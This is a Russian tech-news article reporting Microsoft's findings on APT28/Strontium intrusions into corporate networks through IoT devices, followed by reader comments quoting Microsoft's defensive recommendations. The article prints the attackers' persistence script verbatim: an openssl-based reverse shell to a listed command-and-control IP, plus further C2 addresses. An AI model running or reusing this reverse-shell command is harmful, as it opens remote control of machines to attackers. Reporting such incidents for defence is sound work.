6 авг 2019

Microsoft рассказала об атаках русских хакеров на корпоративные сети через устройства «интернета вещей» Статьи редакции

Целью стали VOIP-телефоны, офисные принтеры и видеодекодеры.

{"id":110066,"url":"https:\/\/tjournal.ru\/news\/110066-microsoft-rasskazala-ob-atakah-russkih-hakerov-na-korporativnye-seti-cherez-ustroystva-interneta-veshchey","title":"Microsoft \u0440\u0430\u0441\u0441\u043a\u0430\u0437\u0430\u043b\u0430 \u043e\u0431 \u0430\u0442\u0430\u043a\u0430\u0445 \u0440\u0443\u0441\u0441\u043a\u0438\u0445 \u0445\u0430\u043a\u0435\u0440\u043e\u0432 \u043d\u0430 \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u0435 \u0441\u0435\u0442\u0438 \u0447\u0435\u0440\u0435\u0437 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430 \u00ab\u0438\u043d\u0442\u0435\u0440\u043d\u0435\u0442\u0430 \u0432\u0435\u0449\u0435\u0439\u00bb","services":{"vkontakte":{"url":"https:\/\/vk.com\/share.php?url=https:\/\/tjournal.ru\/news\/110066-microsoft-rasskazala-ob-atakah-russkih-hakerov-na-korporativnye-seti-cherez-ustroystva-interneta-veshchey&title=Microsoft \u0440\u0430\u0441\u0441\u043a\u0430\u0437\u0430\u043b\u0430 \u043e\u0431 \u0430\u0442\u0430\u043a\u0430\u0445 \u0440\u0443\u0441\u0441\u043a\u0438\u0445 \u0445\u0430\u043a\u0435\u0440\u043e\u0432 \u043d\u0430 \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u0435 \u0441\u0435\u0442\u0438 \u0447\u0435\u0440\u0435\u0437 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430 \u00ab\u0438\u043d\u0442\u0435\u0440\u043d\u0435\u0442\u0430 \u0432\u0435\u0449\u0435\u0439\u00bb","short_name":"VK","title":"\u0412\u041a\u043e\u043d\u0442\u0430\u043a\u0442\u0435","width":600,"height":450},"facebook":{"url":"https:\/\/www.facebook.com\/sharer\/sharer.php?u=https:\/\/tjournal.ru\/news\/110066-microsoft-rasskazala-ob-atakah-russkih-hakerov-na-korporativnye-seti-cherez-ustroystva-interneta-veshchey","short_name":"FB","title":"Facebook","width":600,"height":450},"twitter":{"url":"https:\/\/twitter.com\/intent\/tweet?url=https:\/\/tjournal.ru\/news\/110066-microsoft-rasskazala-ob-atakah-russkih-hakerov-na-korporativnye-seti-cherez-ustroystva-interneta-veshchey&text=Microsoft \u0440\u0430\u0441\u0441\u043a\u0430\u0437\u0430\u043b\u0430 \u043e\u0431 \u0430\u0442\u0430\u043a\u0430\u0445 \u0440\u0443\u0441\u0441\u043a\u0438\u0445 \u0445\u0430\u043a\u0435\u0440\u043e\u0432 \u043d\u0430 \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u0435 \u0441\u0435\u0442\u0438 \u0447\u0435\u0440\u0435\u0437 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430 \u00ab\u0438\u043d\u0442\u0435\u0440\u043d\u0435\u0442\u0430 \u0432\u0435\u0449\u0435\u0439\u00bb","short_name":"TW","title":"Twitter","width":600,"height":450},"telegram":{"url":"tg:\/\/msg_url?url=https:\/\/tjournal.ru\/news\/110066-microsoft-rasskazala-ob-atakah-russkih-hakerov-na-korporativnye-seti-cherez-ustroystva-interneta-veshchey&text=Microsoft \u0440\u0430\u0441\u0441\u043a\u0430\u0437\u0430\u043b\u0430 \u043e\u0431 \u0430\u0442\u0430\u043a\u0430\u0445 \u0440\u0443\u0441\u0441\u043a\u0438\u0445 \u0445\u0430\u043a\u0435\u0440\u043e\u0432 \u043d\u0430 \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u0435 \u0441\u0435\u0442\u0438 \u0447\u0435\u0440\u0435\u0437 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430 \u00ab\u0438\u043d\u0442\u0435\u0440\u043d\u0435\u0442\u0430 \u0432\u0435\u0449\u0435\u0439\u00bb","short_name":"TG","title":"Telegram","width":600,"height":450},"odnoklassniki":{"url":"http:\/\/connect.ok.ru\/dk?st.cmd=WidgetSharePreview&service=odnoklassniki&st.shareUrl=https:\/\/tjournal.ru\/news\/110066-microsoft-rasskazala-ob-atakah-russkih-hakerov-na-korporativnye-seti-cherez-ustroystva-interneta-veshchey","short_name":"OK","title":"\u041e\u0434\u043d\u043e\u043a\u043b\u0430\u0441\u0441\u043d\u0438\u043a\u0438","width":600,"height":450},"email":{"url":"mailto:?subject=Microsoft \u0440\u0430\u0441\u0441\u043a\u0430\u0437\u0430\u043b\u0430 \u043e\u0431 \u0430\u0442\u0430\u043a\u0430\u0445 \u0440\u0443\u0441\u0441\u043a\u0438\u0445 \u0445\u0430\u043a\u0435\u0440\u043e\u0432 \u043d\u0430 \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u0435 \u0441\u0435\u0442\u0438 \u0447\u0435\u0440\u0435\u0437 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430 \u00ab\u0438\u043d\u0442\u0435\u0440\u043d\u0435\u0442\u0430 \u0432\u0435\u0449\u0435\u0439\u00bb&body=https:\/\/tjournal.ru\/news\/110066-microsoft-rasskazala-ob-atakah-russkih-hakerov-na-korporativnye-seti-cherez-ustroystva-interneta-veshchey","short_name":"Email","title":"\u041e\u0442\u043f\u0440\u0430\u0432\u0438\u0442\u044c \u043d\u0430 \u043f\u043e\u0447\u0442\u0443","width":600,"height":450}},"isFavorited":false}

2474 просмотров

Специалисты Центра анализа угроз Microsoft обнаружили атаки на корпоративные сети через устройства «интернета вещей» со стороны группировки Strontium. В некоторых случаях хакерам даже не приходилось ничего взламывать: достаточно было ввести заводские пароли.

В Microsoft обнаружили как минимум три случая подобных атак. Злоумышленники пытались получить доступ к внутренней сети через VOIP-телефон, офисный принтер и видеодекодер. В двух случаях оказалось достаточно ввести заводской пароль, а на третьем устройстве не было установлено последнее обновление безопасности.

Устройства использовали в качестве точки входа. Через них хакеры проникли в сеть и начали сканировать её в поиске других незащищённых устройств с учётными записями с высокими привилегиями.

После получения доступа к каждому из устройств злоумышленники устанавливали скрипт для сниффинга (перехвата) трафика в локальной сети. При перемещении между устройствами хакеры также внедряли скрипт для укоренения в системе.

—contents of [IOT Device] file--
#!/bin/sh
export [IOT Device] ="-qws -display :1 -nomouse"
echo 1|tee /tmp/.c;sh -c '(until (sh -c "openssl s_client -quiet -host
167.114.153.55 -port 443 |while : ; do sh && break; done| openssl
s_client -quiet -host 167.114.153.55 -port 443"); do (sleep 10 &&
cn=$((`cat /tmp/.c`+1)) && echo $cn|tee /tmp.c && if [ $cn -ge 30 ];
then (rm /tmp/.c;pkill -f 'openssl'); fi);done)&' &
--end contents of file--

скрипт для поддержания присутствия хакеров в сети

В Microsoft выяснили, что злоумышленники управляли устройствами с помощью удалённого сервера с IP-адресов 167.114.153.55, 94.237.37.28, 82.118.242.171, 31.220.61.251 и 128.199.199.187. Специалисты считают, что хакеры связаны с группировкой Strontium («Стронций»), также известной как Fancy Bear и APT28.

Эксперты по кибербезопасности и СМИ утверждают, что Fancy Bear связана с российским правительством. Группировке приписывают взлом демпартии США в 2016 году, попытки взломать американских чиновников и помешать европейским выборам в 2019 году.

Так как атаки на устройства «интернета вещей» Microsoft заметила на ранних стадиях, специалисты не установили конечную цель хакеров. Как отметили в компании, только за последние 12 месяцев сотрудники разослали 1400 уведомлений об атаках Strontium по всему миру. Большая часть целей относилась в государственной, IT, военной, оборонной, медицинской, образовательной и инженерной областям.

#хакеры #атаки #microsoft #новости

10 10 комментариев

Реклама на TJ Отключить рекламу

{ "author_name": "Дамир Камалетдинов", "author_type": "editor", "tags": ["\u0445\u0430\u043a\u0435\u0440\u044b","\u043d\u043e\u0432\u043e\u0441\u0442\u0438","\u0430\u0442\u0430\u043a\u0438","microsoft"], "comments": 10, "likes": 19, "favorites": 3, "is_advertisement": false, "subsite_label": "news", "id": 110066, "is_wide": false, "is_ugc": false, "date": "Tue, 06 Aug 2019 20:17:37 +0300", "is_special": false }

{"id":50011,"url":"https:\/\/tjournal.ru\/u\/50011-damir-kamaletdinov","name":"\u0414\u0430\u043c\u0438\u0440 \u041a\u0430\u043c\u0430\u043b\u0435\u0442\u0434\u0438\u043d\u043e\u0432","avatar":"1f7ba499-c42d-57da-b478-8138ae08f2cc","karma":155259,"description":"\u0413\u043b\u0430\u0432\u043d\u044b\u0439 \u043f\u043e \u0442\u0435\u0445\u043d\u043e\u043b\u043e\u0433\u0438\u044f\u043c \u043d\u0430 TJ. \u041f\u043e \u0440\u0430\u0431\u043e\u0442\u0435 \u043f\u0438\u0441\u0430\u0442\u044c damir@tjournal.ru.  Twitter \u2014 \u0434\u043b\u044f \u043a\u043e\u0440\u043e\u0442\u043a\u0438\u0445 \u0431\u044b\u0441\u0442\u0440\u044b\u0445 \u043c\u043d\u0435\u043d\u0438\u0439 Facebook \u2014 \u0434\u043b\u044f \u0440\u0430\u0431\u043e\u0442\u044b Instagram \u2014 \u043a\u0440\u0430\u0441\u0438\u0432\u044b\u0435 (\u0438 \u043d\u0435 \u043e\u0447\u0435\u043d\u044c) \u0444\u043e\u0442\u043e\u0447\u043a\u0438 \u0438\u0437 \u0436\u0438\u0437\u043d\u0438","isMe":false,"isPlus":true,"isVerified":false,"isSubscribed":false,"isNotificationsEnabled":false,"isShowMessengerButton":false}

10 комментариев

Популярные

По порядку

Написать комментарий...

Милый браслет

6 авг 2019

–4

А может мне кто объяснить нафига принтер и телефон в интернет вытаскивать ?
PS Всё что надо знать про IoT, благодаря безумству маркетолог теперь можно взломать микрософт через чайник.

Ответить

Талантливый коктейль

Милый

7 авг 2019

поскольку 99% IOT делают голожопые стартаперы дырок там немеряно

Ответить

Рабочий Илья

Милый

7 авг 2019

Комментарий удален по просьбе пользователя

Ответить

Милый браслет

Илюхер

7.08.2019

Хреново понимаешь.

Ответить

Милый браслет

Илюхер

7.08.2019

–1

Причем тут офис ?

Ответить

Рабочий Илья

Милый

7.08.2019

Комментарий удален по просьбе пользователя

Ответить

Милый браслет

Илюхер

7.08.2019

Ты айтишник из местной группы детсада ?
Иначе у тебя не было бы глупых вопросов.
" нафига принтер и телефон в интернет вытаскивать "

Ответить

Милый браслет

Илюхер

7.08.2019

Бля даже в их посте всё есть.

Recommendations for Securing Enterprise IoT

There are additional steps an organization can take to protect their infrastructure and network from similar activity. Microsoft recommends the following actions to better secure and manage risk associated with IoT devices:

Require approval and cataloging of any IoT devices running in your corporate environment.
Develop a custom security policy for each IoT device.
Avoid exposing IoT devices directly to the internet or create custom access controls to limit exposure.
Use a separate network for IoT devices if feasible.
Conduct routine configuration/patch audits against deployed IoT devices.
Define policies for isolation of IoT devices, preservation of device data, ability to maintain logs of device traffic, and capture of device images for forensic investigation.
Include IoT device configuration weaknesses or IoT-based intrusion scenarios as part of Red Team testing.
Monitor IoT device activity for abnormal behavior (e.g. a printer browsing SharePoint sites…).
Audit any identities and credentials that have authorized access to IoT devices, users and processes.
Centralize asset/configuration/patch management if feasible.
If your devices are deployed/managed by a 3rd party, include explicit Terms in your contracts detailing security practices to be followed and Audits that report security status and health of all managed devices.
Where possible, define SLA Terms in IoT device vendor contracts that set a mutually acceptable window for investigative response and forensic analysis to any compromise involving their product.

Ответить